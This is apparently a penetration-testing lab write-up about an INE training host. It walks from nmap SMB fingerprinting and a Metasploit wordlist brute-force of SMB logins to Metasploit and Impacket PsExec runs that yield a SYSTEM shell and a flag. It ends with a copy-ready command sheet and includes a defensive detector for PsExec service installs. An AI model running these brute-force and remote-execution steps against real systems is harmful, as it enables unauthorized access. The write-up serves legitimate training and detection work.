Exploiting SMB using PsExec

Abusing SMB authentication to execute remote commands via PsExec. Demonstrates a complete attack chain from recon to foothold.

Tools/Skills:
SMB
Pentesting
Windows
MSF
Posted on November 18, 2025

SMB Exploitation — demo.ine.local

Objective

Fingerprint SMB (port 445), discover valid credentials, exploit the service using Metasploit or Impacket’s PsExec, and retrieve the flag.


SMB Overview

SMB (Server Message Block)

  • Protocol for file, printer, and inter-process sharing over TCP (usually ports 445 and 139).

  • Commonly used in Windows domains.

  • Exposes authentication and remote procedure calls (RPC).

  • Vulnerabilities: weak authentication, null sessions, SMB signing not required, or code-execution vectors (e.g., EternalBlue, PsExec abuse).

PsExec concept

  • Windows Sysinternals utility allowing remote code execution via SMB.

  • Works by:

    1. Uploading a service binary to ADMIN$ or another writable share.

    2. Creating and starting a service using Service Control Manager RPC.

    3. Running commands as SYSTEM.

  • Impacket implements this behavior in psexec.py for remote shells or payload staging.


Fingerprinting Phase

Nmap Scan

nmap demo.ine.local

Result → multiple ports open including 445/tcp microsoft-ds.

SMB Protocol Check

nmap -p445 --script smb-protocols demo.ine.local

→ Lists supported SMB versions and dialects (e.g., SMBv2 / SMBv3).


Credential Discovery

Metasploit smb_login module

msfconsole -q
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS demo.ine.local
set VERBOSE false
exploit

→ Found valid credentials for 4 users (e.g., Administrator:qwertyuiop).


Exploitation with Metasploit

PsExec module

use exploit/windows/smb/psexec
set RHOSTS demo.ine.local
set SMBUser Administrator
set SMBPass qwertyuiop
exploit

Outcome:

  • Reverse Meterpreter session opened.

  • Privilege: NT AUTHORITY\SYSTEM.

  • Flag retrieved:

C:\> type flag.txt
e0da81a9cd42b261bc9b90d15f780433


Manual Exploitation — Impacket PsExec

Confirm availability

python3 /usr/share/doc/python3-impacket/examples/psexec.py -h

Run manually

python3 /usr/share/doc/python3-impacket/examples/psexec.py Administrator@10.2.21.62 cmd.exe

When prompted, enter the discovered password.

Execution flow:

  • Connects to SMB on target.

  • Uploads a randomly named service binary (e.g., hbGtcJNF.exe) to the ADMIN$ share.

  • Creates and starts a service.

  • Launches an interactive CMD shell.

Session evidence:

Microsoft Windows [Version 10.0.14393]

C:\Windows\system32> whoami
nt authority\system
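The execution flow above (random binary written to ADMIN$, then a service created and started through the SCM) is also what a defender should be hunting for. As an added example, not part of the original lab notes, the following detector correlates a Windows Security 5145 share-write to ADMIN$ with a System 7045 service-install event whose image path is an 8-letter random executable in the Windows directory. The event dictionaries and the field names used (time, id, share, target, access, src_ip, service, image, account) are assumptions of this example, and the sample events are constructed.

```python
"""Detect PsExec-style service installs from Windows event records (added example).

Assumption: events arrive as dicts carrying the key fields of Security event 5145
(share access) and System event 7045 (service installed). Samples are constructed.
"""
from datetime import datetime, timedelta
import re

# psexec.py drops an executable with a random 8-letter name into ADMIN$ (C:\Windows)
# and registers it as a service; that path shape is the tell.
RANDOM_EXE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.I)
WINDOW = timedelta(seconds=60)  # service install must follow the upload closely

# Constructed sample events (not real logs): a remote ADMIN$ write followed by a
# service install pointing at the uploaded binary, plus two benign records.
SAMPLE_EVENTS = [
    {"time": "2025-11-18T10:00:01", "id": 5145, "share": "\\\\*\\ADMIN$",
     "target": "hbGtcJNF.exe", "access": "0x2", "src_ip": "10.2.21.5"},
    {"time": "2025-11-18T10:00:02", "id": 7045, "service": "hbGtcJNF",
     "image": "%SystemRoot%\\hbGtcJNF.exe", "account": "LocalSystem"},
    {"time": "2025-11-18T10:05:00", "id": 7045, "service": "VendorSvc",
     "image": "C:\\Program Files\\Vendor\\svc.exe", "account": "LocalSystem"},
    {"time": "2025-11-18T10:07:00", "id": 5145, "share": "\\\\*\\IPC$",
     "target": "srvsvc", "access": "0x12019f", "src_ip": "10.2.21.9"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_psexec(events):
    """Return (service_name, image_path, source_ip) for every 7045 whose image
    matches the random-name pattern and was written to ADMIN$ shortly before."""
    writes = [e for e in events if e["id"] == 5145
              and e["share"].upper().endswith("ADMIN$")
              and int(e["access"], 16) & 0x2]  # FILE_WRITE_DATA bit set
    alerts = []
    for svc in (e for e in events if e["id"] == 7045):
        if not RANDOM_EXE.match(svc["image"]):
            continue
        name = svc["image"].rsplit("\\", 1)[-1].lower()
        for w in writes:
            if w["target"].lower() == name and timedelta(0) <= _ts(svc) - _ts(w) <= WINDOW:
                alerts.append((svc["service"], svc["image"], w["src_ip"]))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_psexec(SAMPLE_EVENTS):
        print("PsExec-style service install:", alert)
```

Event 5145 requires the "Detailed File Share" audit subcategory to be enabled; without it only the 7045 path check remains.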


Notes on the SyntaxError

Running /usr/share/doc/python3-impacket/examples/psexec.py directly, without invoking it through python3, caused the script to be interpreted with Python 2 syntax and fail with:

SyntaxError: invalid syntax

Fix → always run with python3.


Post-exploitation checks

From Meterpreter or PsExec shell:

whoami
systeminfo
ipconfig
net user

Use these to confirm privileges, OS, and possible lateral-movement targets.


Key Points

  • SMB on port 445 is a core remote-administration channel; limit its exposure to trusted networks.

  • Weak or reused passwords enable PsExec-style compromise.

  • Metasploit’s exploit/windows/smb/psexec automates the same process as Impacket’s psexec.py.

  • Always verify that the obtained session runs as nt authority\system after exploitation.

  • Clean up uploaded binaries and temporary services when finished.


Replication Quick Sheet

# Discovery
nmap -p445 --script smb-protocols demo.ine.local

# Brute-force
use auxiliary/scanner/smb/smb_login
set USER_FILE common_users.txt
set PASS_FILE unix_passwords.txt
set RHOSTS demo.ine.local
run

# Exploit
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass qwertyuiop
set RHOSTS demo.ine.local
run


Ethical Notice

Only perform SMB exploitation within authorized lab environments.
Disable SMBv1 and enforce strong passwords in production systems.